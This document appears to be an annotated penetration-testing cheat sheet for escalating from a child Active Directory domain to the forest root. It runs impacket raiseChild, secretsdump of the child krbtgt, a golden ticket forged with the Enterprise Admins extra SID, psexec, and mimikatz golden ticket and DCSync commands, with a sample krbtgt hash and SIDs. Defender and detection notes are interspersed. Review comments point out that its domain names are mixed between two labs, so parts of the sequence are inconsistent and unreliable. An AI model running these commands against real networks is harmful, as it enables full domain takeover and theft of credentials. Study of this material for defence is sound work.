Domain Trust
Child -> Parent Trust
# Automatic: impacket-raiseChild runs the whole child-to-parent escalation in one step.
# Defender note: SID filtering is not enforced by default on parent/child trusts
# inside a forest, so the forest (not the domain) is the security boundary. Child
# domain controllers and the child krbtgt account need the same tier-0 protection
# as the forest root.
impacket-raiseChild -target-exec 172.16.5.5 CHILD.COMP.LOCAL/administrator
# Manual variant: the values needed for the ticket are collected here.
# -just-dc-user retrieves one account's secrets over directory replication (DRSUAPI).
# Detection: replication requests that come from a host which is not a domain
# controller (Security event 4662 where directory service access auditing is on).
# NOTE(review): "LOGISTICS/krbtgt" uses a different domain name than the
# child.comp.local used on the other lines; the names look only partly
# substituted. Confirm against the lab the page was written for.
impacket-secretsdump child.comp.local/administrator@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
# SID enumeration over RPC; the greps keep the "Domain SID" line and the lines
# leading up to the "Enterprise Admins" entry.
impacket-lookupsid child.comp.local/administrator@172.16.5.240 | grep "Domain SID"
impacket-lookupsid child.comp.local/administrator@172.16.5.240 | grep -B12 "Enterprise Admins"
# Inputs to impacket-ticketer on the next command, in order:
#   -nthash      child krbtgt NT hash
#   -domain-sid  child domain SID
#   -extra-sid   SID of the Enterprise Admins group (domain SID + RID 519)
#   last arg     arbitrary user name
# Defender note: the hash and SIDs below are the page's example values. If a real
# krbtgt hash is exposed, reset the krbtgt password twice; tickets forged from the
# old key stay usable until then. Kerberos activity for a user name that has no
# matching directory account is a detection signal for this kind of ticket.
impacket-ticketer -nthash 9d765b482771505cbe97411065964d5f -domain CHILD.COMP.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
# Point Kerberos-aware tools at the credential cache file written by ticketer.
export KRB5CCNAME=hacker.ccache
# -k -no-pass: authenticate with the cached ticket instead of a password.
# Detection: psexec-style execution installs a service on the target, which shows
# up as System event 7045 and as writes to the ADMIN$ share.
impacket-psexec CHILD.COMP.LOCAL/hacker@dc01.comp.local -k -no-pass -target-ip 172.16.5.5
# Windows-side equivalent of the same child-to-parent flow, using PowerView and mimikatz.
# NOTE(review): these lines use LOGISTICS.INLANEFREIGHT.LOCAL / INLANEFREIGHT.LOCAL,
# while the impacket commands on this page use CHILD.COMP.LOCAL. Presumably the
# same child/parent pair under different names; confirm.
Import-Module .\PowerView.ps1
# SID of the current domain (the /sid: value below).
Get-DomainSID
# Distinguished name and SID of the parent domain's Enterprise Admins group
# (the /sids: value below, ending in RID 519).
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
# kerberos::golden builds a TGT from the krbtgt hash with the Enterprise Admins SID
# added as an extra SID; /ptt loads it into the current logon session.
# Defender note: this works across the trust because SID filtering is not enforced
# by default between domains of one forest. Response to a krbtgt exposure is a
# double krbtgt password reset in the affected domain.
./mimikatz.exe "kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt" exit
# List the tickets cached in the current session.
klist
# lsadump::dcsync requests one account's secrets from the parent domain through
# directory replication.
# Detection: replication requests from a non-DC source (Security event 4662 where
# directory service access auditing is on); review which principals hold
# replication rights on the domain object.
./mimikatz.exe "lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL" exit